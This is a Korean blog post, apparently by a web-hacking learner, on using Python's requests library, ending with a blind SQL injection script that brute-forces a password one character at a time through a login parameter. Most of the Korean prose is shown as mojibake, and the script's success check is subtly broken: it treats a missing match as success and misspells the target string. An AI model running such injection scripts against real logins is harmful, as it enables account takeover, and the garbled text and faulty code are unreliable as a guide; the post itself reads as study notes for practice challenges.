๐Ÿ” Security

[Web Hacking/Python] Request ๋ชจ๋“ˆ ์‚ฌ์šฉ๋ฒ•

Rosieblue 2023. 9. 24. 17:09
728x90

Request ๋ชจ๋“ˆ

์›นํ•ดํ‚น์„ ํ’€ ๋•Œ ์—ฌํƒœ๊ป ๋ฐ˜๋ณต๋œ ์š”์ฒญ์„ ๋ณด๋‚ผ ๋•Œ์—๋Š” burpsuit๋ฅผ ์‚ฌ์šฉํ–ˆ๋Š”๋ฐ, python์˜ request ๋ชจ๋“ˆ์„ ํ†ตํ•ด์„œ๋„ ์ข‹์€ ๊ฒฐ๊ณผ๋ฅผ ๋‚ผ ์ˆ˜ ์žˆ๋‹ค๋Š” ๊ฒƒ์„ ์•Œ์•˜๋‹ค.

๋‘˜์„ ์„ž์–ด์„œ ์‚ฌ์šฉํ•˜๋ฉด ์ข‹์„ ๊ฒƒ ๊ฐ™์•„์„œ request ๋ชจ๋“ˆ์—๋„ ์ต์ˆ™ํ•ด์ง€๋ ค๊ณ  ํ•œ๋‹ค.

 

 

request ๋ชจ๋“ˆ์„ ์ด์šฉํ•˜๋ฉด GET ์š”์ฒญ์ด๋‚˜ POST ์š”์ฒญ๋“ฑ์„ ๋ณด๋‚ผ ์ˆ˜ ์žˆ๋‹ค(๋ฌผ๋ก  ๋‹ค๋ฅธ ๋ฉ”์†Œ๋“œ๋„ ๊ฐ€๋Šฅํ•˜๋‹ค!)

๋จผ์ € GET ์š”์ฒญ์„ ์–ด๋–ป๊ฒŒ ๋ณด๋‚ด๋Š”์ง€ ์ฝ”๋“œ๋ฅผ ๋ณด์ž.

c=request.get(url,header,params..)์ด๋Ÿฐ์‹์œผ๋กœ ๋ณด๋‚ด๋ฉด get ์š”์ฒญ์ด ๊ฐ€์ง„๋‹ค!

์ด๋•Œ ์‘๋‹ต๊ฐ’ c๋Š” response๋ฅผ ๋ฐ›๊ธฐ ๋•Œ๋ฌธ์— c.raw, c.status_code.. ์ด๋Ÿฐ ์‹์œผ๋กœ ์‘๋‹ต์— ๋Œ€ํ•œ ์ •๋ณด๋„ ๋ฐ›์„ ์ˆ˜ ์žˆ๋‹ค.

 

import requests

#Reqeust URL Setting
url="https://dreamhack.io/" #๊ฐ€์žฅ ๋งŒ๋งŒํ•œ dreamhack ํŽ˜์ด์ง€๋ฅผ ๊ฐ€์ ธ์™€ ๋ดค๋‹ค.

#Request COOKIE value Setting
cookie={'Cookie':'SESSID=SESSION_DATA'}

#GET Request
r=requests.get(url,headers=cookie)#ํ—ค๋”๋กœ ์ฟ ํ‚ค๋ฅผ ๋ณด๋‚ด์ฃผ์—ˆ๋‹ค!!

#POST Request
#POST๋Š” data ์ธ์ž(๋”•์…”๋„ˆ๋ฆฌ)๋„ ๊ผญ ๋„ฃ์–ด์ค˜์•ผํ•œ๋‹ค!
r=requests.post(url,data={
    "param1":"p1",
    "param2":"p2"
}, headers=cookie)

 

 

์‘๋‹ต๊ฐ’์„ ํ™•์ธํ•ด๋ณด์ž. ์ด๋Š” request.๋ฉ”์†Œ๋“œ(~)์˜ ๋ฆฌํ„ด ๊ฐ’์ด๋ผ๊ณ  ํ–ˆ๋‹ค!

# Print URL Data
>>> print (r.url)
https://testurl.com?Param1=value&Param2=value

# Print Content Text
>>> r.text
<!DOCTYPE html>
<head> Test Url </head>
...

# Print Content 
>>> r.content
b'<!DOCTYPE html>\n<html lang="ko">\n<head>\n    <meta http-equiv="Content-Type" cotent= '
...

# Print Raw Content
>>> r.raw
<urllib3.response.HTTPResponse object at 0x000001EEFE821750>

# Print Status Code
>>> r.status_code
200

# Print Response Headers
>>> r.headers
{'Date': 'Mon, 13 Jun 2022 09:51:53 GMT' ...

# Print Response Content-Type
>>> r.headers['Content-Type']
>>> r.headers.get('content-type')
'application/json'

 

 

Blind SQL Injection ๊ณต๊ฒฉ ์Šคํฌ๋ฆฝํŠธ

ex) ๋น„๋ฐ€๋ฒˆํ˜ธ ๊ธ€์ž:20์ž, ๋น„๋ฐ€๋ฒˆํ˜ธ:์•„์Šคํ‚ค์ฝ”๋“œ

import requests
#Blind SQL Injection ๊ณต๊ฒฉ ์Šคํฌ๋ฆฝํŠธ
#ex) ๋น„๋ฐ€๋ฒˆํ˜ธ ๊ธ€์ž:20์ž, ๋น„๋ฐ€๋ฒˆํ˜ธ:์•„์Šคํ‚ค์ฝ”๋“œ

url="~.com"
params={
    "uid":"",
    "upw":""
}

query="' and ascii(substr(upw,{idx},1))={val}--"

password=''

for i in range(1,21):
    for val in range(32,127):
        params["uid"]=query.format(idx=i,val=val)
        c=requests.get(url,params=params)
        print(c.url)
        
        #์‘๋‹ต์— Login Success ๋ฌธ์ž์—ด์ด ์žˆ๋‹ค๋ฉด password์— ๋ฌธ์ž ์ถ”๊ฐ€
        if c.text.find("Login Sucess"):
            password+=chr(val)
            break
        
print(f"Password is {password}")

๋ญ ๋Œ€์ถฉ.. ์ด๋Ÿฐ์‹์œผ๋กœ ํ•˜๋Š” ๊ฒƒ ๊ฐ™๋‹ค

 

 

 

 

์•„๋ž˜ ๋ฌธ์„œ๋ฅผ ๋ณด๋ฉด ๋” ์ž์„ธํžˆ ๋‚˜์™€์žˆ๋‹ค!

Requests: HTTP for Humans™ — Requests 2.31.0 documentation (python-requests.org)

 

Requests: HTTP for Humans™ — Requests 2.31.0 documentation

Requests: HTTP for Humans™ Release v2.31.0. (Installation) Requests is an elegant and simple HTTP library for Python, built for human beings. Behold, the power of Requests: >>> r = requests.get('https://api.github.com/user', auth=('user', 'pass')) >>> r.

docs.python-requests.org

 

References

Python Requests Library (tistory.com)

ServerSide: SQL Injection | Dreamhack